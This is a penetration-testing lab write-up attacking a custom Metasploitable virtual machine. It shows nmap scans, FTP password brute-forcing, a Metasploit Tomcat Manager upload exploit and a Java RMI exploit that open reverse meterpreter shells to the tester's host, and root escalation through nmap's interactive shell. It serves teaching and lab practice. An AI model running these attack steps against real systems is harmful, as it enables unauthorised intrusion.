๐พMetasploitable (Custom 2)
This is a custom vulnerable machine for a penetration testing module. I had to use the provided leaked information to perform tasks and gain root privileges within a given set of time.
Contents
Recon: N.A
Reconnaissance was not needed as I was provided with a list of usernames
Scanning: Nmap
The target IP address was 192.168.249.148
-p-: All ports
--open: Only show open (or possibly open) ports
-sV: Probe open ports to determine service/version info
-A: Enable OS detection, version detection, script scanning, and traceroute
-O: Enable OS detection
-oA: Output in the three major formats at once
โโโ(kaliใฟkali)-[~/custom2]
โโ$ nmap -sV -p- --open 192.168.249.148 -oA c2Open
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-31 08:58 +08
Nmap scan report for 192.168.249.148
Host is up (0.0069s latency).
Not shown: 65505 closed tcp ports (conn-refused), 21 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
2121/tcp open ftp ProFTPD 1.3.1
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
43358/tcp open nlockmgr 1-4 (RPC #100021)
47961/tcp open java-rmi GNU Classpath grmiregistry
54092/tcp open status 1 (RPC #100024)
60676/tcp open mountd 1-3 (RPC #100005)
Service Info: Host: metasploitable.localdomain; OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 129.33 seconds๐ I was reminded not to miss out on UDP scanning to find any potential vulnerabilities too
-sU: UDP Scan
-V: Print version number
-T<0-5>: Set timing template (higher is faster)
-F: Fast mode - Scan fewer ports than the default scan
--version-intensity : Set from 0 (light) to 9 (try all probes)
-oA: Output in the three major formats at once
โโโ(kaliใฟkali)-[~/custom2]
โโ$ sudo nmap -sUV -T4 -F --version-intensity 0 192.168.249.148 -oA c2UDP
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-31 09:07 +08
Nmap scan report for 192.168.249.148
Host is up (0.00071s latency).
Not shown: 64 open|filtered udp ports (no-response), 33 closed udp ports (port-unreach)
PORT STATE SERVICE VERSION
111/udp open rpcbind
137/udp open netbios-ns Samba nmbd netbios-ns (workgroup: WORKGROUP)
2049/udp open tcpwrapped
MAC Address: 00:0C:29:D3:9E:35 (VMware)
Service Info: Host: custom2๐ Masscan can provide a faster scan by using the --rate=1000 flag. It can scan both the TCP and UDP ports together at the same time by using the following example command:
masscan -p1-65535,U:1-65535 10.10.10.x --rate=1000
๐ Enumeration: "It Worked" Brute Force (NSE)
With the provided list of usernames, I can attempt to perform a brute force attack on the FTP port 2121 using the Nmap Scripting Engine (NSE)
PORT STATE SERVICE VERSION
2121/tcp open ftp ProFTPD 1.3.1I had installed the 'seclists' to add more wordlists to my Kali Linux library
sudo apt install seclists
โโโ(kaliใฟkali)-[~]
โโ$ sudo apt install seclists
[sudo] password for kali:
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following NEW packages will be installed:
seclists
0 upgraded, 1 newly installed, 0 to remove and 641 not upgraded.
Need to get 387 MB of archives.
After this operation, 1,559 MB of additional disk space will be used.
Get:1 http://kali.download/kali kali-rolling/main amd64 seclists all 2022.1-0kali1 [387 MB]
Fetched 387 MB in 32s (12.3 MB/s)
Selecting previously unselected package seclists.
(Reading database ... 289621 files and directories currently installed.)
Preparing to unpack .../seclists_2022.1-0kali1_all.deb ...
Unpacking seclists (2022.1-0kali1) ...
Setting up seclists (2022.1-0kali1) ...
Processing triggers for kali-menu (2021.4.2) ...Reference: https://www.kali.org/tools/seclists/
๐ค๐ญ I was initially using Medusa, a brute forcing tool. However, it seemed to be taking quite a while with a wordlist of 500 passwords. I then ran Nmap (NSE) using the same 500 passwords wordlist as shown in Figure 1 below:
๐ค๐ญ Nmap's ftp-brute NSE seemed to be faster as it managed to complete the brute force attempt in 332.63 seconds (about 5.54 mins) while Medusa had yet to complete
For demonstration purpose, I will be using a smaller wordlist: /usr/share/seclists/Passwords/darkweb2017-top10.txt
๐ The default FTP port is 21. In this case, I will need to use the '-sV' flag for FTP port 2121
-sV: Probe open ports to determine service/version info
-p : Only scan specified ports
--script: Runs a script scan using the comma-separated list of filename|category|directory/|expression[,...]
--script-args: Lets you provide arguments to NSE scripts
-oN: Outputs file in a normal format
โโโ(kaliใฟkali)-[~/custom2]
โโ$ sudo nmap -sV -p 2121 --script=ftp-brute --script-args userdb=/home/kali/custom2/usernames.txt,passdb=/usr/share/seclists/Passwords/darkweb2017-top10.txt 192.168.249.148 -oN c2ftpbrute
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-31 12:36 +08
Stats: 0:03:08 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
Nmap scan report for 192.168.249.148
Host is up (0.00037s latency).
PORT STATE SERVICE VERSION
2121/tcp open ftp ProFTPD 1.3.1
| ftp-brute:
| Accounts:
| xxxxxx:xxxxxx - Valid credentials
|_ Statistics: Performed 27320 guesses in 322 seconds, average tps: 81.9
MAC Address: 00:0C:29:D3:9E:35 (VMware)
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 322.37 seconds๐ I managed to find the password used by the username!
| ftp-brute:
| Accounts:
| xxxxxx:xxxxxx - Valid credentialsReference: https://www.infosecmatter.com/nmap-nse-library/?nse=ftp-brute
๐ Exploitation: "Succeeded" Tomcat Manager (Msfconsole)
I will attempt to exploit Tomcat Manager port 8180 using the credentials that were obtained from earlier
PORT STATE SERVICE VERSION
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1Visit the target URL using the internet browser
192.168.249.148:8180
Click on the Tomcat Manager link and enter the default login credentials as shown in Figure 2 below
Username: tomcat
Password: tomcat
I will exploit the Tomcat Manager using Msfconsole
msfconsole
โโโ(kaliใฟkali)-[~/custom2]
โโ$ msfconsole
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|\`.""'.
II 6. .P : .' / | \ `. :
II 'T;. .;P' '.' / | \ `.'
II 'T; ;P' `. / | \ .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v6.1.27-dev ]
+ -- --=[ 2196 exploits - 1162 auxiliary - 400 post ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: When in a module, use back to go
back to the top level prompt
msf6 >search type:exploit tomcat jsp
msf6 > search type:exploit tomcat jsp
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/tomcat_mgr_deploy 2009-11-09 excellent Yes Apache Tomcat Manager Application Deployer Authenticated Code Execution
1 exploit/multi/http/tomcat_mgr_upload 2009-11-09 excellent Yes Apache Tomcat Manager Authenticated Upload Code Execution
2 exploit/windows/http/cayin_xpost_sql_rce 2020-06-04 excellent Yes Cayin xPost wayfinder_seqid SQLi to RCE
3 exploit/linux/http/cpi_tararchive_upload 2019-05-15 excellent Yes Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Vulnerability
4 exploit/multi/http/tomcat_jsp_upload_bypass 2017-10-03 excellent Yes Tomcat RCE via JSP Upload Bypass
Interact with a module by name or index. For example info 4, use 4 or use exploit/multi/http/tomcat_jsp_upload_bypass
msf6 >use exploit/multi/http/tomcat_mgr_upload
set HttpPassword tomcat
set HttpUsername tomcat
set rhosts 192.168.249.148
set rport 8180
set lhost 192.168.249.140
set lport 8999
options
msf6 > use exploit/multi/http/tomcat_mgr_upload
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/http/tomcat_mgr_upload) > set HttpPassword tomcat
HttpPassword => tomcat
msf6 exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat
HttpUsername => tomcat
msf6 exploit(multi/http/tomcat_mgr_upload) > set rhosts 192.168.249.148
rhosts => 192.168.249.148
msf6 exploit(multi/http/tomcat_mgr_upload) > set rport 8180
rport => 8180
msf6 exploit(multi/http/tomcat_mgr_upload) > set lhost 192.168.249.140
lhost => 192.168.249.140
msf6 exploit(multi/http/tomcat_mgr_upload) > set lport 8999
lport => 8999
msf6 exploit(multi/http/tomcat_mgr_upload) > options
Module options (exploit/multi/http/tomcat_mgr_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
HttpPassword tomcat no The password for the specified username
HttpUsername tomcat no The username to authenticate as
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.249.148 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 8180 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /manager yes The URI path of the manager app (/html/upload and /undeploy will be used)
VHOST no HTTP server virtual host
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.249.140 yes The listen address (an interface may be specified)
LPORT 8999 yes The listen port
Exploit target:
Id Name
-- ----
0 Java Universal
msf6 exploit(multi/http/tomcat_mgr_upload) >run
getuid
sysinfo
msf6 exploit(multi/http/tomcat_mgr_upload) > run
[*] Started reverse TCP handler on 192.168.249.140:8999
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying myqVwooMhNFWHuY18YtXDsFlRU1LL...
[*] Executing myqVwooMhNFWHuY18YtXDsFlRU1LL...
[*] Undeploying myqVwooMhNFWHuY18YtXDsFlRU1LL ...
[*] Undeployed at /manager/html/undeploy
[*] Sending stage (58053 bytes) to 192.168.249.148
[*] Meterpreter session 1 opened (192.168.249.140:8999 -> 192.168.249.148:45227 ) at 2022-03-31 16:50:43 +0800
meterpreter > getuid
Server username: tomcat55
meterpreter > sysinfo
Computer : custom2
OS : Linux 2.6.24-16-server (i386)
Meterpreter : java/linux
meterpreter > shell
python -c 'import pty; pty.spawn("/bin/bash")'
nmap --interactive
!sh
whoami
meterpreter > shell
Process 1 created.
Channel 1 created.
python -c 'import pty; pty.spawn("/bin/bash")'
tomcat55@pt003:/$ nmap --interactive
nmap --interactive
Starting Nmap V. 4.53 ( http://insecure.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
sh-3.2# whoami
whoami
root
sh-3.2# ๐ I managed to get the 'root' user by executing '!sh' in the Nmap interactive mode!
Reference: https://www.hackingarticles.in/multiple-ways-to-exploit-tomcat-manager/
๐ Exploitation: "Succeeded" Java RMI (Msfconsole)
I will attempt to exploit the Telnet service on port 23 using the log in credentials that I managed to acquire from earlier
PORT STATE SERVICE VERSION
47961/tcp open java-rmi GNU Classpath grmiregistrymsfconsole
โโโ(kaliใฟkali)-[~/custom2]
โโ$ msfconsole
______________________________________
/ it looks like you're trying to run a \
\ module /
--------------------------------------
\
\
__
/ \
| |
@ @
| |
|| |/
|| ||
|\_/|
\___/
=[ metasploit v6.1.27-dev ]
+ -- --=[ 2196 exploits - 1162 auxiliary - 400 post ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: View missing module options with show
missing
msf6 >search type:exploit java rmi
msf6 > search type:exploit java rmi
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce 2019-05-22 excellent Yes Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE
1 exploit/multi/misc/java_jmx_server 2013-05-22 excellent Yes Java JMX Server Insecure Configuration Java Code Execution
2 exploit/multi/misc/java_rmi_server 2011-10-15 excellent Yes Java RMI Server Insecure Default Configuration Java Code Execution
3 exploit/multi/browser/java_rmi_connection_impl 2010-03-31 excellent No Java RMIConnectionImpl Deserialization Privilege Escalation
4 exploit/multi/browser/java_signed_applet 1997-02-19 excellent No Java Signed Applet Social Engineering Code Execution
5 exploit/multi/http/jenkins_metaprogramming 2019-01-08 excellent Yes Jenkins ACL Bypass and Metaprogramming RCE
6 exploit/linux/misc/jenkins_java_deserialize 2015-11-18 excellent Yes Jenkins CLI RMI Java Deserialization Vulnerability
7 exploit/multi/browser/firefox_xpi_bootstrapped_addon 2007-06-27 excellent No Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution
8 exploit/multi/http/totaljs_cms_widget_exec 2019-08-30 excellent Yes Total.js CMS 12 Widget JavaScript Code Injection
Interact with a module by name or index. For example info 8, use 8 or use exploit/multi/http/totaljs_cms_widget_exec
msf6 >use exploit/multi/misc/java_rmi_server
set rhosts 192.168.249.148
set rport 47961
set lhost 192.168.249.140
set lport 8889
msf6 > use exploit/multi/misc/java_rmi_server
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/misc/java_rmi_server) > set rhosts 192.168.249.148
rhosts => 192.168.249.148
msf6 exploit(multi/misc/java_rmi_server) > set rport 47961
rport => 47961
msf6 exploit(multi/misc/java_rmi_server) > set lhost 192.168.249.140
lhiost => 192.168.249.140
msf6 exploit(multi/misc/java_rmi_server) > set lport 8889
lport => 8889
msf6 exploit(multi/misc/java_rmi_server) > options
Module options (exploit/multi/misc/java_rmi_server):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 yes Time that the HTTP Server will wait for the payload request
RHOSTS 192.168.249.148 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 47961 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or
0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.249.140 yes The listen address (an interface may be specified)
LPORT 8889 yes The listen port
Exploit target:
Id Name
-- ----
0 Generic (Java Payload)
msf6 exploit(multi/misc/java_rmi_server) >run
sf6 exploit(multi/misc/java_rmi_server) > run
[*] Started reverse TCP handler on 192.168.249.140:8889
[*] 192.168.249.148:47961 - Using URL: http://0.0.0.0:8080/ggqTzR
[*] 192.168.249.148:47961 - Local IP: http://192.168.249.140:8080/ggqTzR
[*] 192.168.249.148:47961 - Server started.
[*] 192.168.249.148:47961 - Sending RMI Header...
[*] 192.168.249.148:47961 - Sending RMI Call...
[*] 192.168.249.148:47961 - Replied to request for payload JAR
[*] Sending stage (58053 bytes) to 192.168.249.148
[*] Meterpreter session 1 opened (192.168.249.140:8889 -> 192.168.249.148:60997 ) at 2022-03-31 15:42:26 +0800
[-] 192.168.249.148:47961 - Exploit failed: RuntimeError Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request
[*] 192.168.249.148:47961 - Server stopped.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/misc/java_rmi_server) >๐ค๐ญ I am getting the following errors:
[-] 192.168.249.148:47961 - Exploit failed: RuntimeError Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request
[*] 192.168.249.148:47961 - Server stopped.
[*] Exploit completed, but no session was created.๐ค๐ญ However it did mention that 'Meterpreter session 1 opened'. Hence, I executed 'sessions' just to check if there was indeed one
sessions
msf6 exploit(multi/misc/java_rmi_server) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter java/linux root @ custom2 192.168.249.140:8889 -> 192.168.249.148:60997 (192.168.249.148)
msf6 exploit(multi/misc/java_rmi_server) >sessions 1
getuid
sysinfo
msf6 exploit(multi/misc/java_rmi_server) > sessions 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : custom2
OS : Linux 2.6.24-16-server (i386)
Meterpreter : java/linux
meterpreter > Interrupt: use the 'exit' command to quit
meterpreter >๐ Executing 'getuid' reflected that the Sever username is 'root'!
Last updated